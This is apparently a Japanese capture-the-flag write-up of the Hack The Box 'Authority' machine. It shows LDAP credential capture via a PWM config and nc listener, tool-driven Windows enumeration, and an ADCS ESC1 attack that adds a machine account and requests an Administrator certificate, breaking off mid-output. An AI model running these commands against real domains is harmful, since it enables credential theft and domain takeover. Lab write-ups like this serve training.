┌──(root㉿kali)-[~/work]
└─# ansible-vault decrypt pwm_admin_login   
Vault password: 
Decryption successful
                                                                                                                                                            
┌──(root㉿kali)-[~/work]
└─# cat pwm_admin_login                  
svc_pwm 

色々新たなクレデンシャルが出てきたが、これでもwinrmさんでログインできない!!
また別のルートを探索する必要がありそうです。

project-PWM

今まで収集してきた内容を見返すと、ポートスキャンで8443という気になるPortを発見する。
これはWellkownではないが、たまに開発者がHTTPS443のPortを開発用に8443で設計したりすることがあります。
※ここら辺は開発者側の感覚かなと思われる。
このPortにアクセスしてみます。
3.png
なんだこれはパスワードマネージャー??
調査してみると以下のサイトが見つかります。

もう少し調べてみるとGithubも見つけました。

このパスワードマネージャーがデフォルトで8443のPortを使用するみたいです。
こいつにさっきのpwm_admin_password のパスワードを入れてログインしてみます(ConfigEditorから入らないと弾かれます)。
4.png
ほう、ldapの設定箇所がある。こいつに自分のサーバーの設定を突っ込んでみる。
5.png
ncコマンドで通信を待ち受けていたら認証情報が飛んできました。

┌──(root㉿kali)-[~]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.20] from (UNKNOWN) [10.129.11.152] 51331
0Y`T;CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb lDaP_1n_th3_cle4r!

CNでアカウント名を確認するとsvc_ldap、その後にディレクトリツリーがあり、最後にパスワードらしき文字列が見えますね。
これでアクセスしてみる。
6.png
ログイン成功!User権限をいただきました!!!

特権昇格

情報収集

RustHound

BloodHoundの代わりにRustHoundを使います。DockerでBuildを済ませておけば特段Sharpなどのexeを手動で送りこむ必要もなくささっとzipファイルが手に入るのでお手軽です。

Buildする場合は以下のコマンドを実行しましょう。
※これはちょっと時間かかります。

┌──(root㉿kali)-[/opt/RustHound]
└─# docker build -t rusthound .
[+] Building 296.4s (11/11) FINISHED                                                                                                                        
 => [internal] load build definition from Dockerfile                                                                                                   0.1s
 => => transferring dockerfile: 368B                                                                                                                   0.0s
 => [internal] load .dockerignore                                                                                                                      0.1s
 => => transferring context: 2B                                                                                                                        0.0s
 => [internal] load metadata for docker.io/library/rust:1.64-slim-buster                                                                               2.9s
 => [1/6] FROM docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e                        18.7s
 => => resolve docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e                         0.0s
 => => sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0 194.36MB / 194.36MB                                                     7.7s
 => => sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 984B / 984B                                                             0.0s
 => => sha256:c761809aae5fe07769dab99f4404ca5d71a954934a74484e48eb06c0260ef484 742B / 742B                                                             0.0s
 => => sha256:085572de3c6eef7d59c5fe4feb8263dffa0425acb73747606391b2a8afec2446 4.85kB / 4.85kB                                                         0.0s
 => => sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b 27.14MB / 27.14MB                                                       1.3s
 => => extracting sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b                                                              3.2s
 => => extracting sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0                                                             10.7s
 => [internal] load build context                                                                                                                      0.1s
 => => transferring context: 532.71kB                                                                                                                  0.0s
 => [2/6] WORKDIR /usr/src/rusthound                                                                                                                   1.6s
 => [3/6] RUN apt-get -y update && apt-get -y install gcc libclang-dev clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit m  28.6s
 => [4/6] COPY ./src/ ./src/                                                                                                                           0.1s
 => [5/6] COPY ./Cargo.toml ./Cargo.toml                                                                                                               0.1s 
 => [6/6] RUN cargo install --path .                                                                                                                 237.5s 
 => exporting to image                                                                                                                                 6.9s 
 => => exporting layers                                                                                                                                6.9s 
 => => writing image sha256:490ee8c18b28affff12ed0cb78992e21209368efd68a64772b027f2bf31f8bc8                                                           0.0s 
 => => naming to docker.io/library/rusthound  

Buildが出来ていればDockerでRustHoundを回します。

┌──(root㉿kali)-[/opt/RustHound]
└─# docker run -v /opt/RustHound/work:/tmp/htb rusthound -d authority.htb -i 10.129.11.152 -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -o '/tmp/htb' -z --ldaps
---------------------------------------------------
Initializing RustHound at 06:48:59 on 07/18/23
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2023-07-18T06:48:59Z INFO  rusthound] Verbosity level: Info
[2023-07-18T06:49:00Z INFO  rusthound::ldap] Connected to AUTHORITY.HTB Active Directory!
[2023-07-18T06:49:00Z INFO  rusthound::ldap] Starting data collection...
[2023-07-18T06:49:02Z INFO  rusthound::ldap] All data collected for NamingContext DC=authority,DC=htb
[2023-07-18T06:49:02Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2023-07-18T06:49:02Z INFO  rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2023-07-18T06:49:02Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2023-07-18T06:49:02Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2023-07-18T06:49:02Z INFO  rusthound::json::checker] Checking and replacing some values finished!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 5 users parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 60 groups parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 1 computers parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 3 ous parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 1 domains parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 3 gpos parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 21 containers parsed!

RustHound Enumeration Completed at 06:49:02 on 07/18/23! Happy Graphing!

[2023-07-18T06:49:02Z INFO  rusthound::json::maker] /tmp/htb/20230718064902_authority-htb_rusthound.zip created!

続いてneo4jbloodhoundを起動します。

┌──(root㉿kali)-[~]
└─# neo4j console
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2023-07-18 06:53:04.421+0000 INFO  Starting...
2023-07-18 06:53:05.811+0000 INFO  This instance is ServerId{1400abe5} (1400abe5-d8c9-4976-8194-b3706a4b1946)
2023-07-18 06:53:07.375+0000 INFO  ======== Neo4j 4.4.16 ========
2023-07-18 06:53:09.318+0000 INFO  Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-07-18 06:53:09.332+0000 INFO  Setting up initial user from defaults: neo4j
2023-07-18 06:53:09.335+0000 INFO  Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-07-18 06:53:09.346+0000 INFO  Setting version for 'security-users' to 3
2023-07-18 06:53:09.349+0000 INFO  After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-07-18 06:53:09.352+0000 INFO  Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-07-18 06:53:09.751+0000 INFO  Bolt enabled on localhost:7687.
2023-07-18 06:53:10.869+0000 INFO  Remote interface available at http://localhost:7474/
2023-07-18 06:53:10.871+0000 INFO  id: A26888B9358589A230ADB2D47824D1A3D2343840A955695BD6BE045BDCABB6D9
2023-07-18 06:53:10.872+0000 INFO  name: system
2023-07-18 06:53:10.872+0000 INFO  creationDate: 2023-07-18T06:53:08.125Z
2023-07-18 06:53:10.872+0000 INFO  Started.

┌──(root㉿kali)-[~]
└─# bloodhound 
(node:33662) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron.  See https://github.com/electron/electron/issues/23506 for more information
(node:33731) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.

出来たZIPを投入して確認します。
7.png
何もいいのがなかったです。

winPeas

以下からwinPeasのbatファイルをダウンロードし、対象端末上で実行する。

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload winPEAS.bat                                                                                               
                                                                                                                                                            
Info: Uploading /root/work/winPEAS.bat to C:\Users\svc_ldap\Desktop\winPEAS.bat                                                                             
                                                                                                                                                            
Data: 47928 bytes of 47928 bytes copied                                                                                                                     
                                                                                                                                                            
Info: Upload successful! 
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\winPEAS.bat
                                                                                                                                                            
            ((,.,/((((((((((((((((((((/,  */                                                                                                                
     ,/*,..*(((((((((((((((((((((((((((((((((,                                                                                                              
   ,*/((((((((((((((((((/,  .*//((//**, .*((((((*                                                                                                           
   ((((((((((((((((* *****,,,/########## .(* ,((((((                                                                                                        
   (((((((((((/* ******************/####### .(. ((((((                                                                                                      
   ((((((..******************/@@@@@/***/###### /((((((                                                                                                      
   ,,..**********************@@@@@@@@@@(***,#### ../(((((                                                                                                   
   , ,**********************#@@@@@#@@@@*********##((/ /((((                                                                                                 
   ..(((##########*********/#@@@@@@@@@/*************,,..((((                                                                                                
   .(((################(/******/@@@@@#****************.. /((                                                                                                
   .((########################(/************************..*(                                                                                                
   .((#############################(/********************.,(                                                                                                
   .((##################################(/***************..(                                                                                                
   .((######################################(************..(                                                                                                
   .((######(,.***.,(###################(..***(/*********..(                                                                                                
   .((######*(#####((##################((######/(********..(                                                                                                
   .((##################(/**********(################(**...(                                                                                                
   .(((####################/*******(###################.((((                                                                                                
   .(((((############################################/  /((                                                                                                 
   ..(((((#########################################(..(((((.                                                                                                
   ....(((((#####################################( .((((((.                                                                                                 
   ......(((((#################################( .(((((((.                                                                                                  
   (((((((((. ,(############################(../(((((((((.                                                                                                  
       (((((((((/,  ,####################(/..((((((((((.                                                                                                    
             (((((((((/,.  ,*//////*,. ./(((((((((((.                                                                                                       
                (((((((((((((((((((((((((((/                                                                                                                
                       by carlospolop                                                                                                                       
                                                                                                                                                            
                                                                                                                                                            
/!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script                                                                                   
   WinPEAS should be used for authorized penetration testing and/or educational purposes only.                                                              
   Any misuse of this software will not be the responsibility of the author or of any other collaborator.                                                   
   Use it at your own networks and/or with the network owner's permission.   

...省略

特段いいものがない。

Powerless

以下サイトからPoweless.batをダウンロードする。

また、多くのアクセス権の情報を出力させるためAccessChk.exeを以下からダウンロードします。

回します。

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload accesschk64.exe                                                                                           
                                                                                                                                                            
Info: Uploading /root/work/accesschk64.exe to C:\Users\svc_ldap\Desktop\accesschk64.exe                                                                     
                                                                                                                                                            
Data: 1080552 bytes of 1080552 bytes copied                                                                                                                 
                                                                                                                                                            
Info: Upload successful!                                                                                                                                    
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload Powerless.bat                                                                                             
                                                                                                                                                            
Info: Uploading /root/work/Powerless.bat to C:\Users\svc_ldap\Desktop\Powerless.bat                                                                         
                                                                                                                                                            
Data: 16896 bytes of 16896 bytes copied                                                                                                                     
                                                                                                                                                            
Info: Upload successful!                                                                                                                                    
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\Powerless.bat                                                                                                  
------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------                                                                
Powerless.bat : Access is denied.                                                                                                                           
    + CategoryInfo          : NotSpecified: (Access is denied.:String) [], RemoteException                                                                  
    + FullyQualifiedErrorId : NativeCommandError                                                                                                            
                                                                                                                                                            
----- Architecture -------                                                                                                                                  
PROCESSOR_ARCHITECTURE=AMD64                                                                                                                                
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntel                                                                                     
PROCESSOR_LEVEL=6                                                                                                                                           
PROCESSOR_REVISION=5507                                                                                                                                     
                                                                                                                                                            
------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------           
Current User: svc_ldap                                                                                                                                      
                                                                                                                                                            
USER INFORMATION                                                                                                                                            
----------------                                                                                                                                            
                                                                                                                                                            
User Name    SID                                                                                                                                            
============ =============================================                                                                                                  
htb\svc_ldap S-1-5-21-622327497-3269355298-2248959698-1601     

...省略

特段いいものがない。

PowerUp

以下のリポジトリからダウンロード。回してみる。

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Import-Module C:\Users\svc_ldap\Desktop\PowerUp.ps1
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Invoke-AllChecks

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...
Access denied 
At C:\Users\svc_ldap\Desktop\PowerUp.ps1:457 char:21
+     $VulnServices = Get-WmiObject -Class win32_service | Where-Object ...
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service executable and argument permissions...
Access denied 
At C:\Users\svc_ldap\Desktop\PowerUp.ps1:488 char:5
+     Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pat ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service permissions...
Access denied 
At C:\Users\svc_ldap\Desktop\PowerUp.ps1:534 char:17
+     $Services = Get-WmiObject -Class win32_service | Where-Object {$_ ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking %PATH% for potentially hijackable .dll locations...


HijackablePath : C:\Users\svc_ldap\AppData\Local\Microsoft\WindowsApps\
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Users\svc_ldap\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command '...'

HijackablePathが出てくるけど、WindowsAppsって大体どのBOXでも出てくるんだよねという感覚。
特段いいものはなさそう。

SharpUp.exe

上記から一通りのバイナリはどうせこの後試すだろうから落としておきましょう。
その中からSharpUp.exeを利用します。auditコマンドを使い、全モジュールで検査。

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\SharpUp.exe audit

=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
[X] Unhandled exception in ModifiableServiceRegistryKeys: Exception has been thrown by the target of an invocation.
[X] Unhandled exception in ModifiableServices: Exception has been thrown by the target of an invocation.

[-] Not vulnerable to any of the 15 checked modules.


[*] Completed Privesc Checks in 5 seconds

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop>

特段いいものがなさそう。

手動 enumerate

cmdkey

*Evil-WinRM* PS C:\> cmdkey /list

Currently stored credentials:

* NONE *
*Evil-WinRM* PS C:\> 

クレデンシャルなし

whoami /priv

*Evil-WinRM* PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\> 

ワクスペはまぁ追加できそうですね。

ps

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> ps 

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    397      33    12568      21088              2152   0 certsrv
    159       9     6680        552              2444   0 conhost
    507      19     2244       5460               364   0 csrss
    171       9     1732       4788               476   1 csrss
    407      34    17236      24148              2528   0 dfsrs
    162       9     2000       6224              2932   0 dfssvc
    291      14     3916      13664              3960   0 dllhost
  10408    7405   130960     129320              2564   0 dns
    532      22    23148      42264               992   1 dwm
     54       6     1600       4212              2944   1 fontdrvhost
     54       6     1512       4020              2952   0 fontdrvhost
      0       0       56          8                 0   0 Idle
    206      16     6516      15572              2596   0 inetinfo
    140      12     1908       5824              2104   0 ismserv
    870      35   957656     923320              3808   0 javaw
    474      26    10736      47344              4748   1 LogonUI
   2091     171    66604      73928               616   0 lsass
    558      58    50148      77204              2224   0 Microsoft.ActiveDirectory.WebServices
    255      13     3284      10608              4244   0 msdtc
    135       8     1876       6784              2668   0 nssm
    517      54    73340      11404              2036   0 powershell
      0       8      336     100692                88   0 Registry
    642      36    17084      24008              1148   0 SearchIndexer
    605      14     5708      13544               608   0 services
     53       3      496       1068               272   0 smss
    497      26     6176      18816              3032   0 spoolsv
    189      11     1864       8400               296   0 svchost
    133      16     3952       8188               316   0 svchost
    210      12     1740       7468               360   0 svchost
    143       7     1408       6092               632   0 svchost
     90       5      932       3860               832   0 svchost
    746      16     5280      15136               852   0 svchost
    756      19     6044      12544               888   0 svchost
    241      10     1804       7068               936   0 svchost
    270      15     4244       9848              1032   0 svchost
    221       9     2140       7768              1128   0 svchost
    351      13    10448      15048              1164   0 svchost
    403      33     7068      16468              1272   0 svchost
    250      15     2988      12200              1332   0 svchost
    376      17     5340      13836              1340   0 svchost
    236      12     2688      11916              1348   0 svchost
    437       9     2768       9104              1360   0 svchost
    122       7     1244       5676              1384   0 svchost
    163      10     1720       8164              1484   0 svchost
    327      10     2564       8712              1528   0 svchost
    373      18     5164      14840              1536   0 svchost
    322      12     2144       9152              1588   0 svchost
    181      11     1928       8288              1668   0 svchost
    144       9     1596       6660              1752   0 svchost
    173       9     2152       7488              1784   0 svchost
    269      14     2576       8084              1840   0 svchost
    169      13     1780       7552              1856   0 svchost
    265      13     3724      11360              1892   0 svchost
    223      12     2216       9444              1904   0 svchost
    423      16    13100      21728              1944   0 svchost
    233      12     2696      12676              2028   0 svchost
    179      10     1808       8204              2080   0 svchost
    457      15     3008      11156              2112   0 svchost
    239      25     3856      13148              2164   0 svchost
    190      15     6080      10440              2204   0 svchost
    131       7     1300       5824              2240   0 svchost
    317      16    16124      18136              2276   0 svchost
    458      20    18100      31220              2460   0 svchost
    210      11     2276       8704              2724   0 svchost
    139       9     1592       6632              2744   0 svchost
    141       8     1520       6356              2900   0 svchost
    171      12     3888      11036              3068   0 svchost
    234      15     4708      12056              3084   0 svchost
    278      20     3944      13192              3124   0 svchost
    171      11     2188      13244              3144   0 svchost
    224      12     2144       7688              3196   0 svchost
    322      18     6052      22756              3464   0 svchost
    130       8     2840      10224              3796   0 svchost
    317      21     8864      15996              4636   0 svchost
    408      26     3544      13356              4684   0 svchost
    173      11     2356      13352              4740   0 svchost
    161      10     1984       7016              5088   0 svchost
    167       9     2652       7556              5940   0 svchost
   1483       0      192        156                 4   0 System
    214      16     2408      10660              3680   0 vds
    177      11     3244      11944              3112   0 VGAuthService
    151       8     1676       7300               604   0 vm3dservice
    140       9     1704       7672              2592   1 vm3dservice
    144      10     1784       7696              3456   1 vm3dservice
    404      23    10152      23436              3104   0 vmtoolsd
    173      11     1416       6992               468   0 wininit
    247      12     2584      18440               536   1 winlogon
    394      20    22392      33300              3848   0 WmiPrvSE
    699      27    54204      73672       2.80   2172   0 wsmprovhost

Active Directory証明書サービス(ADCS)が動いている!
EscapeのBOXでも見たサービスですね。

Certify.exe

脆弱な証明書テンプレートがあるか確認します。

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload Certify.exe
                                        
Info: Uploading /root/work/Certify.exe to C:\Users\svc_ldap\Desktop\Certify.exe
                                        
Data: 232104 bytes of 232104 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\Certify.exe find /vulnerable


   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |'
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=authority,DC=htb'

[*] Listing info about the Enterprise CA 'AUTHORITY-CA'

    Enterprise CA Name            : AUTHORITY-CA
    DNS Hostname                  : authority.authority.htb
    FullName                      : authority.authority.htb\AUTHORITY-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=AUTHORITY-CA, DC=authority, DC=htb
    Cert Thumbprint               : 42A80DC79DD9CE76D032080B2F8B172BC29B0182
    Cert Serial                   : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
    Cert Start Date               : 4/23/2023 9:46:26 PM
    Cert End Date                 : 4/23/2123 9:56:25 PM
    Cert Chain                    : CN=AUTHORITY-CA,DC=authority,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               HTB\Domain Admins             S-1-5-21-622327497-3269355298-2248959698-512
      Allow  ManageCA, ManageCertificates               HTB\Enterprise Admins         S-1-5-21-622327497-3269355298-2248959698-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : authority.authority.htb\AUTHORITY-CA
    Template Name                         : CorpVPN
    Schema Version                        : 2
    Validity Period                       : 20 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : HTB\Domain Admins             S-1-5-21-622327497-3269355298-2248959698-512
                                      HTB\Domain Computers          S-1-5-21-622327497-3269355298-2248959698-515
                                      HTB\Enterprise Admins         S-1-5-21-622327497-3269355298-2248959698-519
      Object Control Permissions
        Owner                       : HTB\Administrator             S-1-5-21-622327497-3269355298-2248959698-500
        WriteOwner Principals       : HTB\Administrator             S-1-5-21-622327497-3269355298-2248959698-500
                                      HTB\Domain Admins             S-1-5-21-622327497-3269355298-2248959698-512
                                      HTB\Enterprise Admins         S-1-5-21-622327497-3269355298-2248959698-519
        WriteDacl Principals        : HTB\Administrator             S-1-5-21-622327497-3269355298-2248959698-500
                                      HTB\Domain Admins             S-1-5-21-622327497-3269355298-2248959698-512
                                      HTB\Enterprise Admins         S-1-5-21-622327497-3269355298-2248959698-519
        WriteProperty Principals    : HTB\Administrator             S-1-5-21-622327497-3269355298-2248959698-500
                                      HTB\Domain Admins             S-1-5-21-622327497-3269355298-2248959698-512
                                      HTB\Enterprise Admins         S-1-5-21-622327497-3269355298-2248959698-519

脆弱なテンプレートの見方は以下のサイトにわかりやすくまとまっています。

今回この脆弱なテンプレートを利用できるのはDomain Computersみたいです。
実際にsvc_ldapでテンプレートを要求しても以下のようにエラーが発生する。

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\Certify.exe request /ca:authority.authority.htb\AUTHORITY-CA /template:CorpVPN /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : HTB\svc_ldap
[*] No subject name specified, using current context as subject.

[*] Template                : CorpVPN
[*] Subject                 : CN=svc_ldap, OU=Service Accounts, OU=CORP, DC=authority, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : authority.authority.htb\AUTHORITY-CA

[!] CA Response             : The submission failed: Denied by Policy Module
[!] Last status             : 0x80094012. Message: The permissions on the certificate template do not allow the current user to enroll for this type of certificate. (Exception from HRESULT: 0x80094012)
[*] Request ID              : 3

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA5+XrfwHZXEwcIHZpjAbLu7R6x/TmlcigFIscS/UF4Khk58hG
df63QTx0cvBU30F7PTNAffwrQjhdjRsqFgBCKAitEw8au6TwINhke9ZnhPlbaOD5
4N5PfAjJK52Pbc+LZs8d4utX9N2m7ccWLogt/gqOLJEif+7k6BVFqmiqU1kQoLea
ih2c710RhWslPRYgsOK9aS+Mb1CD9N9S1XgUGrk0XylfaUPiaYi3CoZDemXxw7PS
aO5ZXj8KpMp4bom6WA0XetHNwrHHWSvQ+jyTYDdVTnzif4uM5IPV//0LbDOtCDuw
noaiXCfJCw/nfoGInV2sp9hRooD16BkTNiyI6QIDAQABAoIBAEFxel8yZ2QLuphS
soCo3lAPo+LQM06r+rkxdP/emxUGkMt0kqX0B0VqyTYyqtECisP/tcCYLKEYhRYw
R1VEJ2di420QgyvXZUjvqJPmMvqs4GYdr4cNVgMb+6HKalLEEoQmCTojzoO1Fcne
uFzTY59g3TSolMLj6Uex0SJBPWgdnfTG/+xz0++A9HauQTuDvVwCl+n2pabjIOLz
ut7NVbSPm63L/Lpkys3shNPRYEIwYh2pNNi1ZXdKSjWMSBuIuohLFe53YuP7nG0E
7xUIZXsMExf36gYhyGjckfsZGOIBL+FYrySrz6K5FtwG9DVw1Krd/SeRERG0VzJ1
ys0Qui0CgYEA8tRwXXbqJ6ludQw3lw+Pksq+tymQ7bC2QxnALLaMVrNl/MGQhcYD
0TO5cAfckPeey4lznSg8DL8YeeK4BIm93+hSCCWqndGmyS7Cix7Lu/N8pECtv0Y9
uXQhaOn7tubt5XpSAu0hjKBr8x3gCmI//1Gos0TW775W+f4C/UNo9R8CgYEA9Hmz
NP/FV8zDsF5r/RuBFq9XsjHact+I4qKcoBJSepd9StYBkXntCu4XjDawyHvD5HAa
m3XKFy8F/UO0nJAWjitGidKtjm7UCT55/fp0AQ3WahLgArWXGINuRtUZ2AcswWpG
2myMJ8oJMCwHwuqpPGVm0wYnLMjHmXZGIFFO+PcCgYBMA0olR8smnTgRdcCVDe7w
kXy/00glz5JOUOpCVOZ7YW8EfwchiQm63AkpU5ys2IahyiYhxO1/Q/aCeQEHkqKY
S54aJMhS3MTr5zJI4FwAOskClaiN3owF2J94uv3rlEBV/ENd3SMKZVFFak2uknDc
GJDJhTwPEjMh0GzZINfjGwKBgQDeqgFoohPxNdR9zGH6s5RNPwJWkEVwHtwj3wtc
V5O7iEJbaLMg9rXJILVdxWoaD2+Jnfj94rhfiTqhQ4s6lZmVfyDN4o6kjZidmsOt
aPFDDIFfNzXEAfROJVbJOMpDEbXXq55AzmCQ1NitgUzIYMYm9gxC4vXHOk9hHHIe
eS++XQKBgQChoNM8JqM5aPkRLOgeCfdRrm1WB/jwBLkiBoKvw4BmKGED79Qiuksm
mZUAwHSABe08W12XozCFASnKxbRbxWBlMo7vIrXmplRABI89xpCfk9Pc5YeA63YM
F2+wKWja3MvrM95A3ZFeMav8UCCGOF9kQHhO4f8Um4Q9MjMsvlbTvw==
-----END RSA PRIVATE KEY-----

[X] Error downloading certificate: Cert not yet issued yet! (iDisposition: 2)

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Attack to ADCS

Domain Computerなら脆弱なテンプレートを利用できるので、新規でComputerを作ってしまおうと考えます。

Add New Computer

作成をやり易くするために以下のPowershellをImportしておきましょう。

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Import-Module C:\Users\svc_ldap\Desktop\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Import-Module C:\Users\svc_ldap\Desktop\Powermad.ps1

これで以下の作成コマンドを実行します。Passwordは123456とか適当に設定しときます。

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> New-MachineAccount -MachineAccount TEST -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Domain authority.htb -DomainController authority.authority.htb -Verbose

Certipy

上記で作成したComputerのTEST$としてログインし、証明書テンプレートを要求しないといけないので、一括でできるCertipyを実行します。以下のリポジトリを参考にして欲しい。

回してみると以下のエラーが出る。

┌──(root㉿kali)-[~/work]
└─# certipy req -username TEST@authority.htb -password 123456 -ca AUTHORITY-CA  -dc-ip 10.129.11.152 -template CorpVPN -upn Administrator@AUTHORITY.HTB -debug -target authority.authority.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.11.152[\pipe\cert]
[!] Failed to connect to endpoint ncacn_np:10.129.11.152[\pipe\cert]: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[+] Trying to resolve dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE'
[+] Resolved dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE' to 'ncacn_ip_tcp:10.129.11.152[49722]'
